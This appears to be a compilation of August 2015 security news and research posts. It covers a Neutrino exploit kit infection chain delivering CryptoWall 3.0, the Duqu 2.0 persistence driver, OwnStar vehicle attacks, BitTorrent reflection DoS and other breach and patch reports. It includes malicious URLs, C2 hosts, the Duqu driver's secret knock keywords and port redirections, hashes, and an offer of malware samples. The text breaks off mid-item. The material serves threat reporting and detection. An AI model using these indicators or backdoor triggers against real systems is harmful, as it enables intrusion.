Infection traffic from Wednesday 2015-08-19 shows Neutrino EK on 185.44.105.7 over TCP port 3712. Current URL patterns for Neutrino EK have evolved somewhat since it reappeared in December 2014 after a hiatus of several months [3]. These changes in Neutrino are relatively recent. The EK's URLs are generally shorter than last month, and they show different patterns.

People have asked me why Neutrino EK uses a non-standard TCP port for its HTTP traffic. I can only guess it's an attempt to avoid detection.

Shown above: Wireshark filtered to show URL patterns for Neutrino EK from the 2015-08-19 infection.

Below are images from the TCP streams for Neutrino EK on Wednesday 2015-08-19:

Shown above: Neutrino EK landing page.

Shown above: Neutrino EK sends a Flash exploit.

Shown above: Neutrino EK sends the malware payload, a CryptoWall 3.0 executable (encrypted).

A link to the Hybrid-Analysis.com report for the decrypted payload (CryptoWall 3.0) is here. Below is a list of domains and HTTP requests from the pcap related to Neutrino EK sending CryptoWall 3.0:

Associated domains:

actionasia.com - Compromised website
185.44.105.7 port 3712 - obvpd.mohgroup.xyz:3712 - Neutrino EK
ip-addr.es - address check by CryptoWall 3.0 (not inherently malicious)
172.246.241.236 port 80 - grizzlysts.com - CryptoWall 3.0 callback traffic
46.108.156.176 port 80 - 6i3cb6owitcouepv.spatopayforwin.com - User checking the decrypt instructions
Traffic:

2015-08-19 16:40:07 UTC - actionasia.com - GET /
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /bleed/fasten-22739002
2015-08-19 16:40:13 UTC - obvpd.mohgroup.xyz:3712 - GET /1998/06/02/audience/abandon/debate/hiss-happy-shore-enemy.html
2015-08-19 16:40:15 UTC - obvpd.mohgroup.xyz:3712 - GET /observation/d2V0cGNsaGtuYw
2015-08-19 16:40:18 UTC - obvpd.mohgroup.xyz:3712 - GET /dale/aHB0a2Vj
2015-08-19 16:40:22 UTC - ip-addr.es - GET /
2015-08-19 16:40:25 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?x=nyg80cl4x4
2015-08-19 16:40:27 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?z=7gh5okukgq5qtw
2015-08-19 16:40:31 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?t=d8limjgdeqca
2015-08-19 16:40:40 UTC - grizzlysts.com - POST /wp-content/uploads/rrr.php?u=5cbq0udpvsjx
2015-08-19 16:40:45 UTC - 6i3cb6owitcouepv.spatopayforwin.com - GET /[random string]
Snort-based alerts on the traffic

I tried reading the pcap with the latest version of Snort (2.9.7.5) on a Debian 7 host using the snort registered rule set. The subscriber rule set is more up-to-date, but the registered rule set is free. Make sure to use pulledpork for keeping your rules up-to-date. My results show alerts for CryptoWall during the post-infection traffic, and we also find an alert incorrectly identifying one of the EK URLs as Sweet Orange. See the images below for details.


I also played back the pcap on Security Onion using Suricata and the EmergingThreats (ET) open rule set. Like the snort registered rule set, the ET open rule set is free. Remember to run sudo /usr/bin/rule-update to make sure your rules are up-to-date. The results show alerts for Neutrino EK using signatures from earlier this month. We also find alerts for CryptoWall 3.0. See the images below for details.


Final words

If this change indicates a trend, we might see a large amount of compromised websites pointing to Neutrino EK, along with a corresponding drop in Angler EK traffic. However, criminal groups using these EKs have quickly changed tactics in the past, and the situation may change by the time you read this. We will continue to monitor the threat landscape and let the community know of any significant changes.

Traffic and malware from the analysis are listed below:

Pcap and malware from the Thursday 2015-08-13 Angler EK infection is available here.
A pcap of the Neutrino EK traffic from Wednesday 2015-08-19 is available here.
​A zip archive containing the Neutrino EK flash exploit and malware payload (CryptoWall 3.0) is available here.
The zip archive is password-protected with the standard password. If you don't know it, email admin@malware-traffic-analysis.net and ask.

---
Brad Duncan
Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://malware-traffic-analysis.net/2015/08/13/index.html
[2] https://isc.sans.edu/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/
[3] https://isc.sans.edu/diary/Exploit+Kit+Evolution+Neutrino/19283

Outsourcing critical infrastructure (such as DNS)

19.8.2015
Migrating everything to “cloud” or various online services is becoming increasingly popular in last couple of years (and will probably not stop). However, leaving our most valuable jewels with someone else makes a lot of security people (me included) nervous.

During some of the latest external penetration tests I noticed an increasing trend of companies moving some of their services to various cloud solutions or to their providers.
When performing the reconnaissance phase of a penetration test, a very important part is to try to map the target assets/network as much as possible. Of course, DNS is one of the most important services, which must be available publicly and which sometimes gets misconfigured (how many times have you seen DNS information about internal assets that gets published on the Internet).

So, a simple dig query will tell us what the DNS servers for our target client are:

$ dig ns target.com
;; QUESTION SECTION:
;target.com. IN NS

;; ANSWER SECTION:
target.com. 1365 IN NS zion.target.com.
target.com. 1365 IN NS morpheus.target.com.

;; ADDITIONAL SECTION:
zion.target.com. 1366 IN A 212.71.248.24
morpheus.target.com. 9018 IN A 88.198.75.37

Now what do we have here? Things look generally OK – there are two DNS servers for our target domain, at two different hosting companies (or, for the sake of this article, we can pretend that they are at the target company’s ISP).

The problem here is that the trust for our most critical infrastructure now completely lays with the ISP (or a hosting company). Why is that a problem? Well – remember all those attacks that happen when an account at a registrar gets hacked and domain information (including DNS servers) gets changed? The same thing applies here – DNS servers are the key to our kingdom.

I recently had to work on an incident that included such an attack where the NS records were modified silently by an attacker that got access to the hosting company. And that attack was very sneaky – the attacker modified only selected DNS records: the MX records. So, for couple of hours during a business day, the attacker changed the MX records (only) to point to his SMTP servers. Those servers were configured just to relay e-mail (and additionally, a specific version of an SMTP server was used to prevent adding headers) to the real destination. This was a very simple Man-in-the-Middle attack that was, unfortunately, very successful for the attacker as he was able to collect and analyze absolutely all e-mail sent to the victim company. While he was not able to see the outgoing e-mails, just remember how many times you’ve seen people actually remove the original e-mail (or reply inline) when replying? This is indeed very rare these days although those older will remember that once upon a time it was part of netiquette.

Lessons learned here? While outsourcing DNS servers is not necessarily a bad thing, be aware of the risks that come with it (and with cloud usage in general). For this particular case, depending on the business the target company is in, I most of the times recommend that the DNS servers, as critical infrastructure, are kept on premises and managed by local staff. This way, you decrease the risk of the hosting company getting pwned, or simply risk of a disgruntled employee at the hosting company.

If you do decide to outsource DNS anyway, ask yourself first if you would detect the attack I mentioned? What controls do you have in place for detecting such an attack?
Implementation of additional monitoring controls such as regularly checking your critical DNS records (such as NS, MX and possibly A records for critical names) can go a long way and is very inexpensive. For this particular case, SPF would help as well, but unfortunately the majority of servers will simply use SPF information for spam detection and only very rare MUA’s will warn users when SPF records do not match the sending IP address.

Have similar outsourcing war stories? Let us know!

Payment card info of 93,000 Web.com customers stolen
19.8.2015
The name, address, and credit card information of approximately 93,000 customers of Web.com, a popular US-based provider of Internet services to small businesses, has been compromised due to a breach of one of the company's computer systems.

Social security numbers and card validation codes were not compromised, and only the credit card information on file to pay for Web.com services has been affected.

According to the FAQ document published on Tuesday, the attack was detected on August 13, 2015. The company doesn't say how long the unknown perpetrators had access to the system, but says that the unauthorized activity was uncovered "quickly."

"The company discovered the unauthorized activity as part of its ongoing security monitoring, quickly shut down the access, and immediately began working with a nationally recognized IT security firm to conduct a thorough investigation. We have reported the attack to credit card processors and the proper federal and state authorities," they noted, and added that despite having very strong and sophisticated security measures in place to protect their computer systems, and regularly reviewing and updating their security protocols, no business is immune to cybercrime.

The company has sent out email and regular mail notifications to affected customers, and says that those who didn't and don't receive any of them by by August 30, 2015, can sigh in relief. All in all, the company has around 3.3 million customers.

All affected customers will receive one-year of free credit monitoring, but they will probably have to get new payment cards. In the meantime, they are advised to keep a close eye for any suspicious or unusual activity on the credit/debit cards they used with Web.com.

Core Infrastructure Initiative Launches Open Source Security Badge Program

19.8.2015

The Core Infrastructure Initiative (CII), a consortium of technology companies guided by The Linux Foundation, has thrown good money at solving the security woes of open source software. Since its inception last year, it has provided funding for the OpenSSL project allowing it to hire full-time help and audit and clean its codebase. It has also helped support the Open Crypto Audit Project (OCAP) which was behind the TrueCrypt audit, as well as GnuPG, Frama-C, and the Fuzzing Project. In addition to funding specific projects, CII sponsors initiatives that preempt security trouble. Its latest venture, announced today, is the establishment of a free badge program that helps enterprise developers evaluate whether open source projects follow secure development practices. For now, CII is looking for industry feedback on what criteria should be used to establish the program’s eventual gold, silver and bronze tiers. A first draft of criteria, written by open source and security researcher David A. Wheeler of the Institute for Defense Analyses and Dan Kohn, a CII senior advisor, is available on Github. Amazon Releases S2N TLS Crypto Implementation to Open Source June 30, 2015 , 12:42 pm Some of the criteria, such as whether the project has a public website, basic content, a OSS license, a public version-controlled source repository, bug reporting processes, unique version numbering, change log and more, will ultimately be automatically testable, said CII senior director of infrastructure Emily Ratliff. For other criteria that are not automatically testable, such as whether there are multiple developers who review commits, the CII will develop a survey-based system for those questions. “When you’re creating a project, whether it’s open- or closed-source, very few projects are 100 percent your own code. You have to decide which projects you can rely upon,” Ratliff said. “Open source projects often don’t have risk evaluations, and it’s tricky to do yourself. We’re introducing this best practices badge program to make it easy to find all that information in one place and make it easy to see which project is self-certifying its security best practices around development.” Ratliff hopes that developers—especially those already developing under some kind of software assurance model—contribute not only feedback on existing criteria but share additional best practices. While there is no cost for the badge program, projects will have to enroll and best tested and/or complete the survey, Ratliff said. “We want feedback on the criteria: Is it too easy, too hard,” Ratliff said. “This is ongoing, an open call for anyone. When we feel like we have had sufficient discussion with the key projects and with enough developers, we’ll move on to the next phase [completing the automated testing code and awarding badges].” The CII also announced that it had added two new advisory board members, Adam Shostack and Tom Ritter. Shostack is best known for his time at Microsoft where he designed the freely available threat model tool used by its Security Development Lifecycle. He is also the coauthor of the New School of Information Security. Ritter is practice director of Cryptography Services at the NCC Group one of the auditors involved in the TrueCrypt audit.

Microsoft Security Bulletin MS15-093 - Critical OOB - Internet Explorer RCE

19.8.2015
Security Update for Internet Explorer (3088903)

Recommendation: Test and patch ASAP

Mitigation option: EMET 5.2 configured to protect Internet Explorer (defautlt) is able to block the known exploit

Related Bulletin and KBs:

https://technet.microsoft.com/library/security/MS15-093

https://support.microsoft.com/en-us/kb/3087985
https://support.microsoft.com/en-us/kb/3081444
https://support.microsoft.com/en-us/kb/3088903

Executive Summary

"This security update resolves a vulnerability in Internet Explorer. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 7 (IE 7), Internet Explorer 8 (IE 8), Internet Explorer 9 (IE 9), Internet Explorer 10 (IE 10), and Internet Explorer 11 (IE 11) on affected Windows clients, and Moderate for Internet Explorer 7 (IE 7), Internet Explorer 8 (IE 8), Internet Explorer 9 (IE 9), Internet Explorer 10 (IE 10), and Internet Explorer 11 (IE 11) on affected Windows servers. For more information, see the Affected Software section.
The security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.
For more information about this update, see Microsoft Knowledge Base Article 3088903."

Vulnerability Information

"An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an instant messenger or email message that takes users to the attacker's website, or by getting them to open an attachment sent through email.
An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability."

Researcher releases exploit for OS X 0-day that gives root access
18.8.2015
Italian security researcher Luca Todesco has published PoC exploit code for a newly discovered zero-day privilege escalation flaw affecting OS X Yosemite (v10.10) and Mavericks (v10.9).

Symantec experts have analysed the exploit and say it works as described.

"The exploit uses two different vulnerabilities to create a memory corruption in the OS X kernel. This is then used to bypass security features that block exploit code from running, providing the attacker with root access," they explained.

"While the vulnerabilities require the victim to voluntarily run an application in order for an attack to be successful, they represent a threat until a patch is published by Apple."

According to Todesco, one of the vulnerabilities has been patched in OS X El Capitan (v10.11, still in beta), so the exploit won't work on a machine running it.

He notified Apple of the existence of these flaws a few hours before releasing the exploit, but didn't explain why he released it without giving Apple a chance to plug the hole first. He simply says he "had reasons."

According to Engadget, Todesco and Apple are in contact, and Apple is hopefully working on a fix that will be pushed out soon, as we can be sure that malicious actors are doing their best to find a way to use the exploit.

In the meantime, users can protect themselves against it by downloading and running only applications they trust, by updating to OS X El Capitan, or by installing SUIDGuard, Stefan Esser's kernel extension that, among other things, stops NULL page exploits like Todesco's.

AT&T Facilitated NSA Surveillance Efforts, Reports

17.8.2015

Telecommunication giant AT&T facilitated, to a larger degree than any other provider, the National Security Agency’s surveillance reach beyond domestic telephone data collection to email and Internet traffic, companion New York Times and ProPublica articles said on Saturday. It’s probably the worst-kept secret among the revelations from the NSA documents provided by former contractor Edward Snowden. Suspicion that AT&T was enabling NSA surveillance dates back beyond a 2006 class-action lawsuit filed by the Electronic Frontier Foundation alleging AT&T’s collaboration with the NSA in illegal programs to wiretap and collect data from Americans’ communications and the revelation of the existence of Room 641A of AT&T (SBC Communications) Folsom Street location in San Francisco. NSA Says It Will End Access to 215 Records in November July 28, 2015 , 9:25 am The documents published this weekend demonstrate the coziness of the two sides’ partnership; the documents even stress that NSA agents display a cordial, friendly nature given that the agency’s relationship with AT&T was not contractual. The NSA, according to the documents, has surveillance equipment installed at least 17 AT&T Internet hubs in the U.S., far more than in Verizon hubs, and its budget for operations involving AT&T is double that of the budget for other providers. The Times and ProPublica said that AT&T had given the intelligence agency access to billions of emails moving across domestic networks, and also exposed a secret court order that permitted the wiretapping of Internet communications at United Nations headquarters in New York, an AT&T customer. “These documents not only further confirm our claims in Jewel, but convincingly demolish the government’s core response—that EFF cannot prove that AT&T’s facilities were used in the mass surveillance,” said EFF Executive Director Cindy Cohn. Jewel refers to the EFF’s Jewel vs. NSA suit on behalf of AT&T customers. ”It’s long past time that the NSA and AT&T came clean with the American people,” Cohn said. “It’s also time that the public U.S. courts decide whether these modern general searches are consistent with the Fourth Amendment’s guarantee against unreasonable search and seizure.” The documents provide a blueprint into the NSA’s AT&T and Verizon (MCI) relationship, called Fairview and Stormbrew respectively. Fairview, the Times said, dates back 30 years and is the evidence confirming AT&T as the NSA’s principal partner; AT&T is never mentioned by name in the documents. Investigators at both publications connected a number of dots linking AT&T to the NSA, specifically, repairs made to a Fairview fiber optic cable damaged by the 2011 Japan earthquake that were repaired on the same day as another cable operated in Japan by AT&T; technical terms specific to AT&T were found in the Fairview documents. Also linked to Fairview was evidence of the court order permitting surveillance at the U.N., which was serviced by AT&T. The NSA papers also spell out a timeline of post-September 11 data mining and sharing, pointing out that AT&T began sharing email and phone call metadata days after the attacks while MCI did not until the following February. Two years later, the documents indicate that AT&T was the NSA’s first partner to provide the agency with a “live presence” on the Internet and within months had forwarded 400 billion Internet metadata records—not content—to a keyword selection system operated by the agency. As of late 2003, the Stormbrew program, which cost half the $189 million of Fairview, had yet to turn on these capabilities, the Times reported. Matthew Green, a Johns Hopkins professor and cryptographer, wrote an essay this morning on his personal website aimed at security engineers. In it he said that while some improvement has been made to encrypt data, the security industry still tolerates the existence of unencrypted protocols and services, pointing specifically to ISPs’ practice of downgrading email encryption such as stripping out STARTTLS flags. “Even if we, by some miracle, manage to achieve 100% encryption of communications content, we still haven’t solved the whole problem,” Green wrote. “Unfortunately, today’s protocols still leak a vast amount of useful information via session metadata. And we have no good strategy on the table to defend against it.” Insecure protocols still share in-the-clear data such as protocol type, port number and routing information, Green said, along with traffic characteristics and other related data. “Absolutely none of this is news to security engineers. The problem is that there’s so little we can do about it,” Green said. “Anonymity networks like Tor protect the identity of endpoints in a connection, but they do so at a huge cost in additional bandwidth and latency — and they offer only limited protection in the face of a motivated global adversary. IPSec tunnels only kick the can to a different set of trusted components that themselves can be subverted.” One of the recurring themes at the recent Black Hat conference was the eroding trust in the Internet and the need for security and privacy activists to speak up and also build reliable and secure protocols and systems that are simple to use. Influencers such as keynote speaker Jennifer Granick, a longtime defender of hackers, point out that as more emerging—and sometimes sanctioned—nations come online, Internet traffic may be increasingly routed through countries that don’t have freedom of speech and Bill of Rights. “If you believe that this is the future, then the answer certainly won’t involve legislation or politics. The NSA won’t protect us through cyber-retaliation or whatever plan is on the table today. If you’re concerned about the future, then the answer is to finally, truly believe our propaganda about network trust,” Green said. “We need to learn to build systems today that can survive such an environment. Failing that, we need to adjust to a very different world.”

Using BitTorrent Vulnerabilities to Launch Distributed Reflective DoS Attacks

17.8.2015

Researchers warn that several protocols used by the peer-to-peer file sharing service BitTorrent, including a handful of clients that run the protocol, can be leveraged to carry out distributed reflective denial of service (DRDoS) attacks. Distributed reflective denial of service, or DRDoS attacks, occur when attackers send an overwhelming amount of traffic to amplifiers, which act like reflectors and redirect traffic to a victim. Unlike conventional DoS attacks, in DRDoS attacks traffic isn’t sent directly to the victim. RVulnerabilities Identified in Several WordPress Plugins August 12, 2015 , 3:59 pm Researchers describe several attack scenarios involving the protocol in an academic paper, “P2P File-Sharing in Hell: Exploiting BitTorrent Vulnerabilities to Launch Distributed Reflective DoS Attacks” (.PDF) published as part of USENIX’s Woot ’15 workshop last week. In the paper, Florian Adamsky, a research student at City University London, describes how to exploit common BitTorrent network protocols, including its default transport option, uTP. Adamsky, who’s published BitTorrent research in the past, was assisted by PLUMgrid, Inc.’s Syed Ali Khayam, THM Friedberg’s Rudolf Jager, and another City University London student, Muttukrishnan Rajarajan, on this paper. To test for attacks the researchers put together a “P2P lab testbed” composed of more than 10,000 BitTorrent handshakes – two-way connections between uTP nodes. Assuming they have a valid SHA-1 info-hash, the researchers claim uTP could enable attackers to carry out attacks by using a spoofed IP address. In fact, attacks channeled through BitTorrent could be amplified up to 50 times. This includes those filtered through some of the more protocol’s more popular clients, such as uTorrent, Mainline and one of the biggest culprits, Vuze, which they found heightened attacks up to 54 times. “uTP establishes a connection with a two-way handshake. This allows an attacker to establish a connection with an amplifier using a spoofed IP address, as the receiver does not check whether the initiator has received the acknowledgment,” the paper reads. The vector the attack uses is difficult to detect researchers warn, stressing that a DRDoS attack, routed through BitTorrent, can’t be detected by normal firewalls. Users would have to go further, by implementing a Deep Packet Inspection (DPI) firewall to detect most of the attacks, according to Adamsky and company. An MSE handshake would be even trickier. “In case of a MSE handshake, it is even harder to detect the attack, since the packet contains a high entropy payload with a public key and random data,” the researchers write. To combat the attacks from happening, the researchers encourage developers behind the protocol to switch uTP over to a more secure three-way handshake, like the one that TCP uses, which would prevent attacks like this from happening. The researchers claim there are a handful of other techniques, such as limiting the messages in the first uTP packet that’s sent to amplifiers, that could also help thwart IP spoofing and minimize the number of amplification attacks that use BitTorrent as a medium. The researchers stress that protocols used by BitTorrent other than uTP, including DHT — Distributed Hash Table, MSE — Message Stream Encryption and BTSync — BitTorrent Sync, are also vulnerable to these types attacks. In the case of BTSync, an attacker could use “a single ping message” to amplify some attacks up to 120 times via the protocol, according to the paper. New forms of reflected distributed denial of service attacks are upping the ante when it comes large-scale DDoS attacks. Earlier this year hackers used an old routing protocol RIPv1 found on multiple old and out of date business routers to launch both reflection and amplification-centric DDoS attacks. In April experts warned that of a vulnerability in Multicast DNS that could be harnessed and as a result trigger high volume DDoS amplification attacks.

The Duqu 2.0 persistence module
16.8.2015

We have previously described how Duqu 2.0 doesn’t have a normal “persistence” mechanism. This can lead users to conclude that flushing out the malware is as simple as rebooting all the infected machines. In reality, things are a bit more complicated.

The attackers created an unusual persistence module which they deploy on compromised networks. It serves a double function – it also supports a hidden C&C communication scheme. This organization-level persistence is achieved by a driver that is installed as a normal system service. On 64-bit systems, this implies a strict requirement for an Authenticode digital signature. We have seen two such persistence drivers deployed in the course of attacks.

During their operations the Duqu threat actors install these malicious drivers on firewalls, gateways or any other servers that have direct Internet access on one side and corporate network access on other side. By using them, they can achieve several goals at a time: access internal infrastructure from the Internet, avoid log records in corporate proxy servers and maintain a form of persistence after all.

In essence, the drivers are redirecting network streams to and from the gateway machine that runs it. To forward connections, the attacker first has to pass a network-based “knocking” mechanism by using a secret keyword. We have seen two different secret keywords in the samples we collected so far: “romanian.antihacker” and “ugly.gorilla”.

We described one of these drivers in our whitepaper about Duqu 2.0 (see “The ”portserv.sys” driver analysis” section). Let us repeat some of the most important details. The driver listens to the network and expects a special secret keyword (“romanian.antihacker” in that case). After that, it saves IP of the host that passed the correct secret keyword and starts redirecting all packets from port 443 to 445 (SMB) or 3389 (Remote Desktop) of that server. This effectively allows the attackers to tunnel SMB (i.e. remote file system access) and Remote Desktop through the gateway server while making it look like HTTPS traffic (port 443).

In addition to the “romanian.antihacker” driver, we have discovered another one which did a similar job, however, supporting more connections in a more generic way:

If the driver recognizes the secret keyword “ugly.gorilla1” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 445 (SMB)
If the driver recognizes the secret keyword “ugly.gorilla2” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 3389 (RDP)
If the driver recognizes the secret keyword “ugly.gorilla3” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 135 (RPC)
If the driver recognizes the secret keyword “ugly.gorilla4” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 139 (NETBIOS)
If the driver recognizes the secret keyword “ugly.gorilla5” then all traffic from the attacker’s IP will be redirected from port 1723 (PPTP) to 445 (SMB)
If the driver recognizes the secret keyword “ugly.gorilla6” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 47012 (currently unknown).
We would like to note that one port here looks quite suspicious: 47012. So far, we haven’t seen any other Duqu 2.0 components using this port, nor have we found any other common malware, backdoor or legitimate software using this port (also according to SANS). However, considering that this port number was hardcoded into the malware this may be a good indicator of compromise for Duqu 2.0.

duqu2_1

Part of the malware with array of secret keywords

This 64-bit driver contains an internal DLL name, “termport.sys”, while the filename in the filesystem was “portserv.sys”. This most likely means that the attackers change filenames for different operations and detection of this attack should not solely rely on names of the files. The compilation timestamp is apparently fake here: “Jul 23 18:14:28 2004”. All the discovered driver files were located in “C:\Windows\System32\drivers\”.

Perhaps the most important part of this attack strategy is the digital signature used for the 64-bit driver. Because this is a mandatory requirement on 64-bit Windows systems, the driver had a valid digital signature. It was signed by “HON HAI PRECISION INDUSTRY CO. LTD.” (also known as “Foxconn Technology Group”, one of the world’s largest electronics manufacturers).

duqu2_2

Digital signature of attacker’s driver

According to the information from the driver it was signed at 20:31 on 19.02.2015. Below are some more details provided by SysInternal’s sigcheck utility:

Verified: Signed
Signing date: 20:31 19.02.2015
Publisher: HON HAI PRECISION INDUSTRY CO. LTD.
Description: Port Optimizer for Terminal Server
Product: Microsoft Windows Operating System
Prod version: 6.1.7601
File version: 6.1.7601 built by: WinDDK
MachineType: 64-bit
MD5: 92E724291056A5E30ECA038EE637A23F
SHA1: 478C076749BEF74EAF9BED4AF917AEE228620B23
PESHA1: F8457AFBD6967FFAE71A72AA44BC3C3A134103D8
PE256: 2891059613156734067A1EF52C01731A1BCFB9C50E817F3CA813C19114BFA556
SHA256: BC4AE56434B45818F57724F4CD19354A13E5964FD097D1933A30E2E31C9BDFA5
According to Wikipedia “Foxconn Technology Group” is the world’s largest electronics contract manufacturer and is headquartered in Tucheng, New Taipei, Taiwan.

Major customers of Foxconn include or have included some of the world’s largest enterprises:

Acer Inc.
Amazon.com
Apple Inc.
BlackBerry Ltd.
Cisco
Dell
Google
Hewlett-Packard
Huawei
Microsoft
Motorola Mobility
Nintendo
Nokia
Sony
Toshiba
Xiaomi
Vizio
Foxconn manufactures several popular https://en.wikipedia.org/wiki/Foxconn products including BlackBerry, iPad, iPhone, Kindle, PlayStation 4, Xbox One and Wii U.

The same certificate was used by the manufacturer to sign several WatchDog Timer Kernel drivers (WDTKernel.sys) for Dell laptops in February 2013.

Conclusions

During our previous research into Stuxnet and Duqu we have observed digitally signed malware (using malicious Jmicron and Realtek certs). Stealing digital certificates and signing malware on behalf of legitimate businesses seems to be a regular trick from the Duqu attackers. We have no confirmation that any of these vendors have been compromised but our indicators definitely show that the Duqu attackers have a major interest in hardware manufacturers such as Foxconn, Realtek and Jmicron. This was confirmed in the 2014/2015 attacks, when we observed infections associated with hardware manufacturers from APAC, including ICS and SCADA computer equipment manufacturers.

Another interesting observation is that besides these Duqu drivers we haven’t uncovered any other malware signed with the same certificates. That rules out the possibility that the certificates have been leaked and are being used by multiple groups. It also seems to indicate the Duqu attackers are the only ones who have access to these certificates, which strengthens the theory they hacked the hardware manufacturers in order to get these certificates.

Finally, it’s interesting that the Duqu attackers are also careful enough not to use same digital certificate twice. This is something we have seen with Duqu from both 2011 and 2015. If that’s true, then it means that the attackers might have enough alternative stolen digital certificates from other manufacturers that are ready to be used during the next targeted attack. This would be extremely alarming because it effectively undermines trust in digital certificates.

Both Verisign and HON HAI have been informed about the use of the certificate to sign the Duqu 2.0 malware.

IOC

Sample MD5 (portserv.sys): 92e724291056a5e30eca038ee637a23f

Serial number of Foxconn certificate used by Duqu attackers:

‎25 65 41 e2 04 61 90 33 f8 b0 9f 9e b7 c8 8e f8

Full certificate of the malicious driver:

OwnStar Attack Now Aimed at BMW, Chrysler, Mercedes Cars

16.8.2015

The OwnStar attack that hacker Samy Kamkar revealed late last month can be used against not only GM vehicles, but cars manufactured by Mercedes-Benz, BMW, and Chrysler, as well. The attack allows Kamkar to intercept the traffic from nearby mobile phones that have specific apps open that control safety and security features on their vehicles. Kamkar built a Raspberry Pi-based device he calls OwnStar to execute the attack, which he demonstrated originally against the GM OnStar RemoteLink app. The device can intercept the traffic, send special packets to the device, gain credentials and then locate, unlock, and start the victim’s vehicle. “After a user opens the RemoteLink mobile app on their phone near my OwnStar device, OwnStar intercepts the communications and sends specially crafted packets to the mobile device to acquire additional credentials then notifies me, the attacker, about the vehicle that I indefinitely have access to, including its location, make, and model,” Kamkar said in a video demonstrating the device. Shortly after Kamkar disclosed the attack, which took advantage of a flaw in the RemoteLink app, GM issued a fix. But Kamkar said that he discovered the attack also works against the mobile apps used by BMW, Mercedes-Benz, and Chrysler owners. The BMW Remote, Mercedes-Benz mbrace, and Chrysler Uconnect apps all are vulnerable to the attack, Kamkar said. The main problem is that the apps fail to validate SSL certificates. Kamkar has been taking dead aim at vehicle security in recent weeks. Last week at DEF CON, he gave a talk on the topic and disclosed details of another device he’s built called RollJam that enables him to intercept signals from car remotes and replay them later to unlock the vehicles. The device can be hidden under a car and works against vehicles that use rolling, rather than fixed, codes. “So when you are walking towards your car, you hit the unlock button — because it’s jammed, the car can’t hear it, however my device is also listening so my device hears your signal (and removes the jamming signal because it knows what to remove). Now I have a rolling code that your car has not yet heard,” Kamkar said via email.

IT threat evolution in Q2 2015

14.8.2015

Download PDF version

Q2 in figures

According to KSN data, Kaspersky Lab solutions detected and repelled a total of 379,972,834 malicious attacks from online resources located all over the world.
Kaspersky Lab’s web antivirus detected 26,084,253 unique malicious objects: scripts, exploits, executable files, etc.
65,034,577 unique URLs were recognized as malicious by web antivirus components.
51% of web attacks neutralized by Kaspersky Lab products were carried out using malicious web resources located in Russia.
There were 5,903,377 registered notifications about attempted malware infections aiming at stealing money via online access to bank accounts.
Kaspersky Lab’s file antivirus detected a total of 110,731,713 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected
1,048,129 installation packages;
291,887 new malicious mobile programs;
630 mobile banker Trojans.
Overview

Targeted attacks and malware campaigns

Monkey business

Recently we published our analysis of CozyDuke, yet another cyber-espionage APT from the ‘Duke’ family – which also includes MiniDuke, CosmicDuke and OnionDuke. CozyDuke (also known as ‘CozyBear’, ‘CozyCar’ and ‘Office Monkeys’) targets government organisations and businesses in the US, Germany, South Korea and Uzbekistan.

IT threat evolution Q2 2015

The attack implements a number of sophisticated techniques, including encryption, anti-detection capabilities and a well-developed set of components that are structurally similar to earlier threats within the ‘Duke’ family.

However, one of CozyDuke’s most notable features is its use of social engineering to get an initial foothold in targeted organisations. Some of the attackers’ spear-phishing emails contain a link to hacked web sites – including high-profile, legitimate sites – that host a ZIP archive. This archive contains a RAR SFX that installs the malware while showing an empty PDF as a decoy. Another approach is to send out fake flash videos as email attachments. A notable example (which also gives the malware one of its names) is ‘OfficeMonkeys LOL Video.zip’. When run, this drops a CozyDuke executable on to the computer, while playing a ‘fun’ decoy video showing monkeys working in an office. This encourages victims to pass the video around the office, increasing the number of compromised computers.

It is necessary to make staff education a core component of any business security strategy #KLReport
The successful use of social engineering to trick staff into doing something that jeopardises corporate security – by CozyDuke and many other targeted attackers – underlines the need to make staff education a core component of any business security strategy.

Naikon: gathering geo-political intelligence

In May we published our report on the Naikon APT. Naikon is used in campaigns against sensitive targets in South-eastern Asia and around the South China Sea. The attackers seem to be Chinese-speaking and have been active for at least five years, focusing their attention on top-level government agencies and civil and military organizations in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, Nepal, Thailand, Laos and China.

IT threat evolution Q2 2015

As with so many campaigns of this kind, the attackers use spear-phishing emails to trick unsuspecting staff into loading the malware. Emails include an attached file containing information likely to be of interest to the victim. The file seems to be a standard Word document, but it is really an executable with a double extension, or an executable that uses the RTLO (right to left override) mechanism to mask the real extension of the file. If the victim clicks on the file, it installs spyware on the computer while displaying a decoy document to avoid arousing suspicion.

The attackers use spear-phishing emails to trick staff into loading malware #KLReport
Naikon’s main module is a remote administration tool: this module supports 48 commands to exercise control over infected computers. These include commands to take a complete inventory, download and upload data, and install add-on modules. In addition, Naikon sometimes uses keyloggers to obtain employees’ credentials.

Each target country is assigned its own operator, who is able to take advantage of local cultural features – for example, the tendency to use personal email accounts for work. They also made use of a specific proxy server within a country’s borders, to manage connections to infected computers and transfer data to the attackers’ Command-and-Control (C2) servers.

You can find our main report and follow-up report on our web site.

Spying on the spies

